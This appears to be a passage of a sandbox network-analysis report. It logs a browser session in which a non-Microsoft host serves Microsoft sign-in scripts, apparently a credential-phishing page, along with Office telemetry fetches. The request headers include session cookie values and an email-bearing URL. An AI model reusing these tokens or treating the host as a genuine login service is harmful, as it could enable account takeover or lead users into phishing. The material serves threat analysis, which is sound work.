                                                  2024-11-27 17:10:05 UTC16384INData Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67
                                                  Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  93192.168.2.64981094.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:04 UTC1685OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:06 UTC1386INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:05 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 190151
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Thu, 27 Oct 2022 14:24:13 GMT
                                                  ETag: 0x8DAB826EBE74413
                                                  x-ms-request-id: e1ed38c5-401e-001b-5fef-40c2f8000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171004Z-1544c49f7f8fm8qzhC1ZRHx53400000002tg000000003ppd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:06 UTC14998INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                  Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                  2024-11-27 17:10:06 UTC1386INData Raw: 0d 08 ce 9e 0b aa 1f 8b 11 3c 08 9b 78 48 97 78 46 a5 24 ab d9 bc 5e b4 ed cd 0b ab ad e8 df 24 ba fd 5b b7 2f b7 77 88 4f c2 67 46 4d 1f 0b 75 02 77 fb 58 84 c3 d5 d5 a1 d5 c7 aa bc 89 52 ee 73 55 63 12 54 51 9e 19 a5 98 4c 6c 9b aa 29 7f 81 0e 15 8b c8 b4 6e 6d b8 35 23 fc 77 92 1f 7d c2 7d 60 e9 5a 4e 05 80 55 57 16 ca 64 24 83 8f 7e c9 a2 18 6f be 60 b5 e3 f7 6b ee db cb 3a 66 b6 43 02 28 82 2d f7 ac 41 3e 33 02 d7 52 93 5d 5b 34 e4 fa 89 04 cc b0 a4 8b 56 fe 62 07 43 75 54 db 27 52 61 9c c6 98 e4 50 a6 06 44 5d 6a 06 b3 6a 82 95 ba 93 06 36 1c 95 4e f9 bb 66 f8 2c 4d 84 8f 0d 47 8a 26 24 6d ba 5f e8 23 82 5e ae 0b 25 99 5f 59 dc 77 52 b5 ef 64 61 dc 24 de 4f 1c 01 23 91 79 96 8d 51 e7 a8 6c 4b 13 34 8f 0f b6 c9 ce 5a 39 e8 80 15 a4 7c 3d 89 b6 fd 8f
                                                  Data Ascii: <xHxF$^$[/wOgFMuwXRsUcTQLl)nm5#w}}`ZNUWd$~o`k:fC(-A>3R][4VbCuT'RaPD]jj6Nf,MG&$m_#^%_YwRda$O#yQlK4Z9|=
                                                  2024-11-27 17:10:06 UTC16384INData Raw: 95 a1 50 20 13 dc 09 ae 34 e2 7c 9d 30 c3 e4 c1 b6 9c ec e3 12 20 93 46 e3 3e 5b 03 ed 8f 67 c0 df fb 78 dd a8 ae 19 4d 00 1b f1 d1 0b 4a 7e 13 a6 94 dc 94 fe 24 50 2d cd 47 c7 3d 85 da e1 a9 62 8c 17 47 aa d5 45 78 07 f5 10 07 b4 78 d7 96 12 fa cd e1 40 53 82 00 82 12 ad ae 46 4d f9 c1 a7 c0 2f 64 02 06 d0 26 7a 72 65 91 74 91 31 d8 a2 52 17 e0 ac 82 55 04 66 ae 27 73 c2 f1 f4 4e 01 40 75 31 14 5d 18 6a c4 18 b2 35 15 0a d7 1f b2 c6 32 9c 55 a1 f8 e4 d6 c7 75 7d aa 14 55 21 35 ef fd 38 ba cc eb 7b 49 9f 4d 47 4b d0 e5 be d2 67 31 94 26 37 0c 28 1e c0 a4 59 3c 4b b5 71 c3 5c 85 c2 bd 2b ec d1 92 4d 17 61 b4 95 83 6f ef 6c 96 7c 4d d2 9b e4 cc 13 1e 9b 94 25 3b 59 f4 98 d7 35 b4 ba 8c f2 2b e1 55 59 58 bd d2 fc fe e1 bb b2 80 60 9e 8b 78 bc 40 3a 5d 23 d7
                                                  Data Ascii: P 4|0 F>[gxMJ~$P-G=bGExx@SFM/d&zret1RUf'sN@u1]j52Uu}U!58{IMGKg1&7(Y<Kq\+Maol|M%;Y5+UYX`x@:]#
                                                  2024-11-27 17:10:06 UTC16384INData Raw: cc 68 6f b7 b7 64 ca dd ae 4a d9 e6 94 0f 04 97 4e a7 c2 f3 c0 0e a7 9c 5c a7 49 24 dd 09 ec 72 ca af 8c 88 09 2d 8c 1f 39 e5 34 9e a8 6a 9e 8b 84 db 42 a7 bc 10 4d 31 6e 5a 3c b6 5b a2 db 88 43 dd 12 3d 7d fb d7 30 69 b7 16 fa f8 3e ba 0a 07 54 7e cb df 9f e6 45 7a 1b a9 00 e4 6a 68 f2 b5 bd b5 69 c2 3f 35 45 44 aa 8f 69 2a f6 d3 1c ee fe 11 06 7b 48 f3 40 04 2d 47 ba a3 09 38 bc bd 8d 86 31 dc 16 6c 9b e0 50 7c 7f 9e e4 93 68 00 ab b6 21 cd b3 1c 6c 0b 77 e6 d6 26 55 73 2e 1e b6 90 b0 bb 4d 73 77 2e 1e 76 fc 37 e9 14 ca 0c bb 3e a8 0f 9a 1e 76 57 f0 dc 87 3a 00 b7 fb c2 84 90 d5 be 66 71 11 13 14 69 6f 9a 50 4f 16 3a 3e 3a a0 9e 1c 7c fc 78 fc 91 8a 7e de fb 78 74 78 f4 13 75 e5 f0 e8 ed f1 c7 0f 7b 67 87 c7 47 ed 2d 13 cc 11 ca 6d 0b 35 2b 02 4e 38 96
                                                  Data Ascii: hodJN\I$r-94jBM1nZ<[C=}0i>T~Ezjhi?5EDi*{H@-G81lP|h!lw&Us.Msw.v7>vW:fqioPO:>:|x~xtxu{gG-m5+N8
                                                  2024-11-27 17:10:06 UTC2309INData Raw: e8 02 ed b7 1b 30 09 aa 8b f1 66 7d dd 87 be a5 89 29 6d ad 56 10 1e 45 fe f0 c5 b9 27 2d 54 f4 8d b9 67 48 81 d4 bd 69 12 41 b4 ab f6 4a a9 88 ba 2e f7 14 bf d4 b7 af c8 76 f5 ce 84 88 a4 94 5f fe db 53 02 7c b1 3a 29 cc e0 d4 b9 d5 53 c2 5a f1 1f e1 60 c9 b8 fe d9 5f a6 f1 1e 54 72 f7 2c d6 a6 25 92 b2 05 54 5c b4 7c f5 7c 28 37 70 f8 65 05 40 cc 2d 6c 6a bc cc 66 37 ee 9e 80 f9 cc fa e3 37 ef 09 3a dc 42 5c 16 d1 31 a2 c7 eb d1 b0 76 6c d1 e2 73 a3 67 88 37 5c 6a b0 71 e8 99 52 9f ad a4 04 19 38 94 39 82 75 69 60 e7 f4 5c 2a b4 a1 16 43 bd ad 52 4b 99 83 5a 36 cd 5a 4a ba 22 d3 d4 48 d1 25 4a 49 0a 37 39 2a 67 69 94 18 95 d1 95 a2 45 59 7e 67 31 04 91 52 b1 e0 10 44 c8 86 46 78 19 dd 79 81 ef 00 67 8c 2f 7c 47 71 b0 b5 45 aa 18 02 b8 0d 91 67 44 1e 8a
                                                  Data Ascii: 0f})mVE'-TgHiAJ.v_S|:)SZ`_Tr,%T\||(7pe@-ljf77:B\1vlsg7\jqR89ui`\*CRKZ6ZJ"H%JI79*giEY~g1RDFxyg/|GqEgD
                                                  2024-11-27 17:10:06 UTC9575INData Raw: ad ed ca 9b db c6 95 fc ff fb 29 6c ee ab 14 39 86 15 49 3e 92 48 c3 a8 14 3b 87 de 24 b6 c7 ce 31 bb 1e 8d 8b 92 28 99 36 45 ea 91 94 9d 4c ec ef be 7d 00 20 40 51 76 de 66 77 6a 1c 91 00 08 82 38 1a dd 8d ee 5f 7b 1d a8 08 37 c9 9e c6 fc 78 83 3b 4c 01 55 73 4a f0 d5 9d e3 41 99 b9 98 91 1a 7f 77 af 49 ff 71 83 d1 66 50 7d 23 9a 43 71 0d b7 23 b8 dd 17 3b ea 36 80 db d6 73 f1 02 ee 2d 85 b0 41 8a 08 d9 e9 b7 ee 3b a2 30 7f 7b c2 1c b5 c2 1e 2d 7b 68 ec 75 51 0e ce ca 33 78 56 c0 06 f7 85 e6 3d 77 45 a1 78 4f 65 ca 21 97 f6 af 51 af b4 ca aa 81 e3 43 0b 65 84 0e ea 64 2a 72 94 27 dd 57 b2 c7 46 34 a3 11 3d 4a 93 53 3c bb 46 15 d3 19 b9 09 78 02 be be 2a 75 a4 56 2f 81 00 5b 13 13 89 23 04 f9 19 52 73 d2 56 b3 f2 98 4c be 28 4c b7 d4 1b 27 b6 de 38 2c 55
                                                  Data Ascii: )l9I>H;$1(6EL} @Qvfwj8_{7x;LUsJAwIqfP}#Cq#;6s-A;0{-{huQ3xV=wExOe!QCed*r'WF4=JS<Fx*uV/[#RsVL(L'8,U


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  94192.168.2.64981113.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:04 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1141
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:10:04 UTC1141OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:06 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171005Z-174f7845968nxc96hC1EWRspw80000000ww000000000qmzc
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.64981213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:05 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:06 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:05 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91EAD002"
                                                  x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171005Z-174f7845968ljs8phC1EWRe6en0000000x2000000000dqy4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.64981313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:05 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:06 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 432
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                  ETag: "0x8DC582BAABA2A10"
                                                  x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171006Z-174f7845968g6hv8hC1EWR1v2n000000053g00000000k8xp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:06 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.64981413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:05 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:06 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA740822"
                                                  x-ms-request-id: 48855d02-a01e-0053-3f66-408603000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171006Z-174f784596886s2bhC1EWR743w0000000x8g00000000cnkx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:06 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.64981613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:05 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:06 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA4037B0D"
                                                  x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171006Z-174f78459685726chC1EWRsnbg0000000x6g00000000p4mf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:06 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.64981513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:05 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:06 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                  ETag: "0x8DC582BB464F255"
